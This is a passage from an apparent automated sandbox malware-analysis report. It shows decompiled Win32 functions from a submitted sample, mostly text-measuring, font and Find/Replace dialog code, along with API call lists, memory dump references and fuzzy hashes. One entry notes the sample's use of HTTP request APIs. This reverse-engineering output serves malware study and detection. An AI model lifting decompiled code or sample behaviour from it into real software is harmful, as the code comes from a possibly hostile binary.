                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0252429C
                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 025242A6
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Internet$CloseHandle$HttpOpenOptionRequest$ConnectErrorFileLastQueryReadSendlstrlenwsprintf
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2082764430-0
                                                                                                                                                                                                                                                                                          • Opcode ID: cac5eb598011e3025bfd3ce525b4309c6a0d8895317d56ddd471764706ed79e9
                                                                                                                                                                                                                                                                                          • Instruction ID: d107eb3a106b14876ac793fd21bd0d5802e0c0ecedaf328abaafdb614584f9bc
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cac5eb598011e3025bfd3ce525b4309c6a0d8895317d56ddd471764706ed79e9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2251FD75944218AFEB24CF95DC89BEE77B4FB49700F108598EA05B72C0C7B8AA94CF54
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                                                                                                          			E00100880(intOrPtr __ecx, void* __edx, void* __esi) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v24;
                                                                                                                                                                                                                                                                                          				struct tagLOGFONTA _v84;
                                                                                                                                                                                                                                                                                          				char _v140;
                                                                                                                                                                                                                                                                                          				void _v144;
                                                                                                                                                                                                                                                                                          				void* _v148;
                                                                                                                                                                                                                                                                                          				void* _v152;
                                                                                                                                                                                                                                                                                          				intOrPtr _v156;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				signed int _t51;
                                                                                                                                                                                                                                                                                          				void* _t55;
                                                                                                                                                                                                                                                                                          				signed int _t64;
                                                                                                                                                                                                                                                                                          				intOrPtr _t65;
                                                                                                                                                                                                                                                                                          				int _t67;
                                                                                                                                                                                                                                                                                          				void* _t68;
                                                                                                                                                                                                                                                                                          				int _t76;
                                                                                                                                                                                                                                                                                          				intOrPtr _t80;
                                                                                                                                                                                                                                                                                          				void* _t82;
                                                                                                                                                                                                                                                                                          				intOrPtr _t89;
                                                                                                                                                                                                                                                                                          				void* _t97;
                                                                                                                                                                                                                                                                                          				intOrPtr _t103;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t104;
                                                                                                                                                                                                                                                                                          				signed int _t106;
                                                                                                                                                                                                                                                                                          				void* _t107;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t105 = __esi;
                                                                                                                                                                                                                                                                                          				_t97 = __edx;
                                                                                                                                                                                                                                                                                          				_t51 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t51 ^ _t106;
                                                                                                                                                                                                                                                                                          				_t103 = __ecx;
                                                                                                                                                                                                                                                                                          				_t80 =  *((intOrPtr*)(__ecx + 0x14));
                                                                                                                                                                                                                                                                                          				_v156 = __ecx;
                                                                                                                                                                                                                                                                                          				if(( *(_t80 + 8) & 0x00000800) == 0) {
                                                                                                                                                                                                                                                                                          					_t104 = GetWindowDC(0);
                                                                                                                                                                                                                                                                                          					_v148 = 0;
                                                                                                                                                                                                                                                                                          					if(( *(_t80 + 0xc) & 0x00001000) == 0) {
                                                                                                                                                                                                                                                                                          						_t55 =  *(__esi + 0xa4);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_v84.lfHeight = 0;
                                                                                                                                                                                                                                                                                          						E00106820( &(_v84.lfWidth), 0, 0x38);
                                                                                                                                                                                                                                                                                          						_t107 = _t107 + 0xc;
                                                                                                                                                                                                                                                                                          						GetObjectA( *(__esi + 0xa4), 0x3c,  &_v84);
                                                                                                                                                                                                                                                                                          						_v84.lfWeight = _v84.lfWeight + 0xc8;
                                                                                                                                                                                                                                                                                          						_t55 = CreateFontIndirectA( &_v84);
                                                                                                                                                                                                                                                                                          						_v148 = _t55;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v152 = SelectObject(_t104, _t55);
                                                                                                                                                                                                                                                                                          					_v24.left = 0;
                                                                                                                                                                                                                                                                                          					_v24.top = 0;
                                                                                                                                                                                                                                                                                          					_v24.right = 0;
                                                                                                                                                                                                                                                                                          					_v24.bottom = 0;
                                                                                                                                                                                                                                                                                          					DrawTextA(_t104,  *(_t80 + 4), 0xffffffff,  &_v24, 0x424);
                                                                                                                                                                                                                                                                                          					_t82 = _v24.right - _v24.left;
                                                                                                                                                                                                                                                                                          					SelectObject(_t104, _v152);
                                                                                                                                                                                                                                                                                          					_v144 = 0;
                                                                                                                                                                                                                                                                                          					E00106820( &_v140, 0, 0x38);
                                                                                                                                                                                                                                                                                          					GetObjectA( *(_t105 + 0xa4), 0x3c,  &_v144);
                                                                                                                                                                                                                                                                                          					_t64 = _v144;
                                                                                                                                                                                                                                                                                          					if(_t64 < 0) {
                                                                                                                                                                                                                                                                                          						_t64 =  ~_t64;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t89 =  *((intOrPtr*)(_t105 + 0x9c));
                                                                                                                                                                                                                                                                                          					_t65 = _t64 + 8;
                                                                                                                                                                                                                                                                                          					if(_t65 <= _t89) {
                                                                                                                                                                                                                                                                                          						_t65 = _t89;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_v156 + 0x10)) = _t65;
                                                                                                                                                                                                                                                                                          					_t46 =  *((intOrPtr*)(_t105 + 0xb0)) +  *(_t105 + 0x98) * 2 + 5; // 0xeb102474
                                                                                                                                                                                                                                                                                          					_t67 = GetSystemMetrics(0x47);
                                                                                                                                                                                                                                                                                          					_t101 = _v156;
                                                                                                                                                                                                                                                                                          					_t68 = _v148;
                                                                                                                                                                                                                                                                                          					_t85 = _t82 + _t46 - _t67 + 1;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_v156 + 0xc)) = _t82 + _t46 - _t67 + 1;
                                                                                                                                                                                                                                                                                          					if(_t68 != 0) {
                                                                                                                                                                                                                                                                                          						DeleteObject(_t68);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return E001059E6(ReleaseDC(0, _t104), _t85, _v8 ^ _t106, _t101, _t104, _t105);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t76 = GetSystemMetrics(0xf);
                                                                                                                                                                                                                                                                                          					asm("cdq");
                                                                                                                                                                                                                                                                                          					 *(_t103 + 0x10) = _t76 - _t97 >> 1;
                                                                                                                                                                                                                                                                                          					 *(_t103 + 0xc) = 0;
                                                                                                                                                                                                                                                                                          					return E001059E6(_t76 - _t97 >> 1, _t80, _v8 ^ _t106, _t97, _t103, __esi);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}




























                                                                                                                                                                                                                                                                                          0x00100880
                                                                                                                                                                                                                                                                                          0x00100880
                                                                                                                                                                                                                                                                                          0x00100889
                                                                                                                                                                                                                                                                                          0x00100890
                                                                                                                                                                                                                                                                                          0x00100895
                                                                                                                                                                                                                                                                                          0x00100897
                                                                                                                                                                                                                                                                                          0x001008a1
                                                                                                                                                                                                                                                                                          0x001008a7
                                                                                                                                                                                                                                                                                          0x001008d8
                                                                                                                                                                                                                                                                                          0x001008e3
                                                                                                                                                                                                                                                                                          0x001008e9
                                                                                                                                                                                                                                                                                          0x00100929
                                                                                                                                                                                                                                                                                          0x001008eb
                                                                                                                                                                                                                                                                                          0x001008ee
                                                                                                                                                                                                                                                                                          0x001008f5
                                                                                                                                                                                                                                                                                          0x00100900
                                                                                                                                                                                                                                                                                          0x0010090a
                                                                                                                                                                                                                                                                                          0x00100910
                                                                                                                                                                                                                                                                                          0x0010091b
                                                                                                                                                                                                                                                                                          0x00100921
                                                                                                                                                                                                                                                                                          0x00100921
                                                                                                                                                                                                                                                                                          0x00100945
                                                                                                                                                                                                                                                                                          0x0010094f
                                                                                                                                                                                                                                                                                          0x00100952
                                                                                                                                                                                                                                                                                          0x00100955
                                                                                                                                                                                                                                                                                          0x00100958
                                                                                                                                                                                                                                                                                          0x0010095b
                                                                                                                                                                                                                                                                                          0x0010096a
                                                                                                                                                                                                                                                                                          0x0010096f
                                                                                                                                                                                                                                                                                          0x00100980
                                                                                                                                                                                                                                                                                          0x0010098a
                                                                                                                                                                                                                                                                                          0x001009a2
                                                                                                                                                                                                                                                                                          0x001009a8
                                                                                                                                                                                                                                                                                          0x001009b0
                                                                                                                                                                                                                                                                                          0x001009b2
                                                                                                                                                                                                                                                                                          0x001009b2
                                                                                                                                                                                                                                                                                          0x001009b4
                                                                                                                                                                                                                                                                                          0x001009ba
                                                                                                                                                                                                                                                                                          0x001009bf
                                                                                                                                                                                                                                                                                          0x001009c1
                                                                                                                                                                                                                                                                                          0x001009c1
                                                                                                                                                                                                                                                                                          0x001009c9
                                                                                                                                                                                                                                                                                          0x001009dd
                                                                                                                                                                                                                                                                                          0x001009e1
                                                                                                                                                                                                                                                                                          0x001009e7
                                                                                                                                                                                                                                                                                          0x001009ef
                                                                                                                                                                                                                                                                                          0x001009f5
                                                                                                                                                                                                                                                                                          0x001009f6
                                                                                                                                                                                                                                                                                          0x001009fb
                                                                                                                                                                                                                                                                                          0x001009fe
                                                                                                                                                                                                                                                                                          0x001009fe
                                                                                                                                                                                                                                                                                          0x00100a1c
                                                                                                                                                                                                                                                                                          0x001008a9
                                                                                                                                                                                                                                                                                          0x001008ab
                                                                                                                                                                                                                                                                                          0x001008b1
                                                                                                                                                                                                                                                                                          0x001008b6
                                                                                                                                                                                                                                                                                          0x001008b9
                                                                                                                                                                                                                                                                                          0x001008cf
                                                                                                                                                                                                                                                                                          0x001008cf

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 001008AB
                                                                                                                                                                                                                                                                                          • GetWindowDC.USER32(00000000,?,?), ref: 001008D2
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 001008F5
                                                                                                                                                                                                                                                                                          • GetObjectA.GDI32(?,0000003C,?), ref: 0010090A
                                                                                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 0010091B
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00100931
                                                                                                                                                                                                                                                                                          • DrawTextA.USER32(00000000,?,000000FF,000FC567,00000424), ref: 0010095B
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 0010096F
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 0010098A
                                                                                                                                                                                                                                                                                          • GetObjectA.GDI32(?,0000003C,00000000), ref: 001009A2
                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 001009E1
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 001009FE
                                                                                                                                                                                                                                                                                          • ReleaseDC.USER32 ref: 00100A07
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Object$MetricsSelectSystem_memset$CreateDeleteDrawFontIndirectReleaseTextWindow
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2607864528-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 77c190da4f62d099ec152913dd9b0e27957fe19cd1253fa0c2c2cff0a0ff5c68
                                                                                                                                                                                                                                                                                          • Instruction ID: ccade1f8148cfa7e6c0f1a73ab9bbeff6d41ec37094048f43733e7f9f9900284
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77c190da4f62d099ec152913dd9b0e27957fe19cd1253fa0c2c2cff0a0ff5c68
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E411970A00309DFDB55DFA8DD85BAAB7B8FB48304F108599A549E7281DBB0A984CF61
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                                                                                                          			E000F6DE0(int __ecx, int __edx, void* __esi, long _a4) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				signed int _v52;
                                                                                                                                                                                                                                                                                          				short _v182;
                                                                                                                                                                                                                                                                                          				struct tagTEXTMETRICA _v240;
                                                                                                                                                                                                                                                                                          				signed int _v244;
                                                                                                                                                                                                                                                                                          				void* _v256;
                                                                                                                                                                                                                                                                                          				int _v260;
                                                                                                                                                                                                                                                                                          				int _v268;
                                                                                                                                                                                                                                                                                          				void* _v272;
                                                                                                                                                                                                                                                                                          				void* _v280;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v284;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				signed int _t32;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t40;
                                                                                                                                                                                                                                                                                          				int _t49;
                                                                                                                                                                                                                                                                                          				void* _t60;
                                                                                                                                                                                                                                                                                          				signed int _t69;
                                                                                                                                                                                                                                                                                          				int _t75;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t78;
                                                                                                                                                                                                                                                                                          				void* _t79;
                                                                                                                                                                                                                                                                                          				void* _t80;
                                                                                                                                                                                                                                                                                          				signed int _t81;
                                                                                                                                                                                                                                                                                          				signed int _t83;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t80 = __esi;
                                                                                                                                                                                                                                                                                          				_t83 = (_t81 & 0xfffffff8) - 0xf0;
                                                                                                                                                                                                                                                                                          				_t32 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t32 ^ _t83;
                                                                                                                                                                                                                                                                                          				_v240.tmHeight = CallWindowProcA( *(__esi + 0x20),  *(__esi + 4), __edx, __ecx, _a4);
                                                                                                                                                                                                                                                                                          				SendMessageA( *(__esi + 4), 0x435, 0, 0x3d0900);
                                                                                                                                                                                                                                                                                          				SendMessageA( *(__esi + 4), 0x30,  *(__esi + 0x4c), 1);
                                                                                                                                                                                                                                                                                          				_t40 =  *(__esi + 4);
                                                                                                                                                                                                                                                                                          				_v244 = _t40;
                                                                                                                                                                                                                                                                                          				_t78 = GetDC(_t40);
                                                                                                                                                                                                                                                                                          				_v256 = SelectObject(_t78,  *(__esi + 0x4c));
                                                                                                                                                                                                                                                                                          				GetTextMetricsA(_t78,  &_v240);
                                                                                                                                                                                                                                                                                          				_v260 = GetDeviceCaps(_t78, 0x58);
                                                                                                                                                                                                                                                                                          				SelectObject(_t78, _v272);
                                                                                                                                                                                                                                                                                          				_t49 = MulDiv(_v244 * 8, 0x5a0, _v268);
                                                                                                                                                                                                                                                                                          				if(_t49 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          					_v182 = 0x20;
                                                                                                                                                                                                                                                                                          					_v240.tmDigitizedAspectX = 0x10;
                                                                                                                                                                                                                                                                                          					_t69 = 0;
                                                                                                                                                                                                                                                                                          					_t75 = _t49;
                                                                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                                                                          						 *(_t83 + 0x6c + _t69 * 4) = _t75;
                                                                                                                                                                                                                                                                                          						_t69 = _t69 + 1;
                                                                                                                                                                                                                                                                                          						_t75 = _t75 + _t49;
                                                                                                                                                                                                                                                                                          					} while (_t69 < 0x20);
                                                                                                                                                                                                                                                                                          					_v240.tmOverhang = 0x9c;
                                                                                                                                                                                                                                                                                          					SendMessageA( *(__esi + 4), 0x447, 0,  &(_v240.tmOverhang));
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				SelectObject(_t78, _v280);
                                                                                                                                                                                                                                                                                          				SendMessageA( *(_t80 + 4), 0xb9, 0, 0);
                                                                                                                                                                                                                                                                                          				ReleaseDC(_v284, _t78);
                                                                                                                                                                                                                                                                                          				_pop(_t79);
                                                                                                                                                                                                                                                                                          				_pop(_t60);
                                                                                                                                                                                                                                                                                          				return E001059E6(_v280, _t60, _v52 ^ _t83,  *(_t80 + 4), _t79, _t80);
                                                                                                                                                                                                                                                                                          			}



























                                                                                                                                                                                                                                                                                          0x000f6de0
                                                                                                                                                                                                                                                                                          0x000f6de6
                                                                                                                                                                                                                                                                                          0x000f6dec
                                                                                                                                                                                                                                                                                          0x000f6df3
                                                                                                                                                                                                                                                                                          0x000f6e26
                                                                                                                                                                                                                                                                                          0x000f6e2a
                                                                                                                                                                                                                                                                                          0x000f6e38
                                                                                                                                                                                                                                                                                          0x000f6e3a
                                                                                                                                                                                                                                                                                          0x000f6e3e
                                                                                                                                                                                                                                                                                          0x000f6e48
                                                                                                                                                                                                                                                                                          0x000f6e5b
                                                                                                                                                                                                                                                                                          0x000f6e5f
                                                                                                                                                                                                                                                                                          0x000f6e6e
                                                                                                                                                                                                                                                                                          0x000f6e78
                                                                                                                                                                                                                                                                                          0x000f6e94
                                                                                                                                                                                                                                                                                          0x000f6e9d
                                                                                                                                                                                                                                                                                          0x000f6ea4
                                                                                                                                                                                                                                                                                          0x000f6ea9
                                                                                                                                                                                                                                                                                          0x000f6eb1
                                                                                                                                                                                                                                                                                          0x000f6eb3
                                                                                                                                                                                                                                                                                          0x000f6eb5
                                                                                                                                                                                                                                                                                          0x000f6eb5
                                                                                                                                                                                                                                                                                          0x000f6eb9
                                                                                                                                                                                                                                                                                          0x000f6eba
                                                                                                                                                                                                                                                                                          0x000f6ebc
                                                                                                                                                                                                                                                                                          0x000f6ed1
                                                                                                                                                                                                                                                                                          0x000f6ed9
                                                                                                                                                                                                                                                                                          0x000f6ed9
                                                                                                                                                                                                                                                                                          0x000f6ee1
                                                                                                                                                                                                                                                                                          0x000f6ef4
                                                                                                                                                                                                                                                                                          0x000f6efc
                                                                                                                                                                                                                                                                                          0x000f6f0d
                                                                                                                                                                                                                                                                                          0x000f6f0e
                                                                                                                                                                                                                                                                                          0x000f6f19

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CallWindowProcA.USER32 ref: 000F6E0A
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000435,00000000,003D0900), ref: 000F6E2A
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000030,?,00000001), ref: 000F6E38
                                                                                                                                                                                                                                                                                          • GetDC.USER32(?), ref: 000F6E42
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 000F6E4F
                                                                                                                                                                                                                                                                                          • GetTextMetricsA.GDI32(00000000,?), ref: 000F6E5F
                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 000F6E68
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 000F6E78
                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(00000000,000005A0,?), ref: 000F6E94
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000447,00000000,?), ref: 000F6ED9
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 000F6EE1
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,000000B9,00000000,00000000), ref: 000F6EF4
                                                                                                                                                                                                                                                                                          • ReleaseDC.USER32 ref: 000F6EFC
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageSend$ObjectSelect$CallCapsDeviceMetricsProcReleaseTextWindow
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2146902509-0
                                                                                                                                                                                                                                                                                          • Opcode ID: b7c83e5d0cf692ec9797372616c4194366b0df7197906de7d08f0d8ca94a5515
                                                                                                                                                                                                                                                                                          • Instruction ID: 0fe6ed0515ff962469472ab137c7f485656b9f3d8840e8c6ffb1086698052738
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7c83e5d0cf692ec9797372616c4194366b0df7197906de7d08f0d8ca94a5515
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58312775614304AFD324DF64DD89F6BB7E8AB8CB00F00890CB699C7690DBB4E8418B66
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                                                                                                                          			E000FC9B0(CHAR* __eax, signed int __ecx, CHAR* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
                                                                                                                                                                                                                                                                                          				CHAR* _t12;
                                                                                                                                                                                                                                                                                          				int _t17;
                                                                                                                                                                                                                                                                                          				int _t20;
                                                                                                                                                                                                                                                                                          				CHAR* _t23;
                                                                                                                                                                                                                                                                                          				CHAR* _t25;
                                                                                                                                                                                                                                                                                          				intOrPtr _t28;
                                                                                                                                                                                                                                                                                          				intOrPtr _t30;
                                                                                                                                                                                                                                                                                          				CHAR* _t35;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t36;
                                                                                                                                                                                                                                                                                          				CHAR* _t39;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t12 = __eax;
                                                                                                                                                                                                                                                                                          				_t30 = _a4;
                                                                                                                                                                                                                                                                                          				 *(_t30 + 0x30) =  *(_t30 + 0x30) | __ecx;
                                                                                                                                                                                                                                                                                          				_t35 = __edx;
                                                                                                                                                                                                                                                                                          				if(__eax == 0) {
                                                                                                                                                                                                                                                                                          					_t12 = GetActiveWindow();
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *(_t30 + 0x28) = _t12;
                                                                                                                                                                                                                                                                                          				if(_t35 != 0) {
                                                                                                                                                                                                                                                                                          					_t25 = _t30 + 0x4c;
                                                                                                                                                                                                                                                                                          					if(_t25 != 0) {
                                                                                                                                                                                                                                                                                          						if(lstrlenA(_t35) <= 0x7f) {
                                                                                                                                                                                                                                                                                          							_t20 = lstrlenA(_t35);
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t20 = 0x7f;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t12 = lstrcpynA(_t25, _t35, _t20 + 1);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t23 = _a12;
                                                                                                                                                                                                                                                                                          				if(_t23 != 0) {
                                                                                                                                                                                                                                                                                          					_t39 = _t30 + 0xcc;
                                                                                                                                                                                                                                                                                          					if(_t39 != 0) {
                                                                                                                                                                                                                                                                                          						if(lstrlenA(_t23) <= 0x7f) {
                                                                                                                                                                                                                                                                                          							_t17 = lstrlenA(_t23);
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t17 = 0x7f;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t12 = lstrcpynA(_t39, _t23, _t17 + 1);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t36 = _t30 + 8;
                                                                                                                                                                                                                                                                                          				if(_t36 == 0) {
                                                                                                                                                                                                                                                                                          					RaiseException(0xc0000005, 1, 0, 0);
                                                                                                                                                                                                                                                                                          					asm("int3");
                                                                                                                                                                                                                                                                                          					asm("int3");
                                                                                                                                                                                                                                                                                          					asm("int3");
                                                                                                                                                                                                                                                                                          					asm("int3");
                                                                                                                                                                                                                                                                                          					asm("int3");
                                                                                                                                                                                                                                                                                          					asm("int3");
                                                                                                                                                                                                                                                                                          					return _t12;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					 *_t36 = _t30;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t36 + 4)) = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                          					EnterCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          					_t28 =  *0x170c80; // 0x0
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t36 + 8)) = _t28;
                                                                                                                                                                                                                                                                                          					 *0x170c80 = _t36;
                                                                                                                                                                                                                                                                                          					LeaveCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          					_push(_t30 + 0x24);
                                                                                                                                                                                                                                                                                          					if(_a8 == 0) {
                                                                                                                                                                                                                                                                                          						return ReplaceTextA(??);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						return FindTextA();
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                                          0x000fc9b0
                                                                                                                                                                                                                                                                                          0x000fc9b5
                                                                                                                                                                                                                                                                                          0x000fc9b8
                                                                                                                                                                                                                                                                                          0x000fc9bb
                                                                                                                                                                                                                                                                                          0x000fc9bf
                                                                                                                                                                                                                                                                                          0x000fc9c1
                                                                                                                                                                                                                                                                                          0x000fc9c1
                                                                                                                                                                                                                                                                                          0x000fc9c7
                                                                                                                                                                                                                                                                                          0x000fc9cd
                                                                                                                                                                                                                                                                                          0x000fc9cf
                                                                                                                                                                                                                                                                                          0x000fc9d4
                                                                                                                                                                                                                                                                                          0x000fc9e0
                                                                                                                                                                                                                                                                                          0x000fc9ea
                                                                                                                                                                                                                                                                                          0x000fc9e2
                                                                                                                                                                                                                                                                                          0x000fc9e2
                                                                                                                                                                                                                                                                                          0x000fc9e2
                                                                                                                                                                                                                                                                                          0x000fc9f4
                                                                                                                                                                                                                                                                                          0x000fc9f4
                                                                                                                                                                                                                                                                                          0x000fc9d4
                                                                                                                                                                                                                                                                                          0x000fc9fa
                                                                                                                                                                                                                                                                                          0x000fc9ff
                                                                                                                                                                                                                                                                                          0x000fca01
                                                                                                                                                                                                                                                                                          0x000fca09
                                                                                                                                                                                                                                                                                          0x000fca15
                                                                                                                                                                                                                                                                                          0x000fca1f
                                                                                                                                                                                                                                                                                          0x000fca17
                                                                                                                                                                                                                                                                                          0x000fca17
                                                                                                                                                                                                                                                                                          0x000fca17
                                                                                                                                                                                                                                                                                          0x000fca29
                                                                                                                                                                                                                                                                                          0x000fca29
                                                                                                                                                                                                                                                                                          0x000fca09
                                                                                                                                                                                                                                                                                          0x000fca2f
                                                                                                                                                                                                                                                                                          0x000fca35
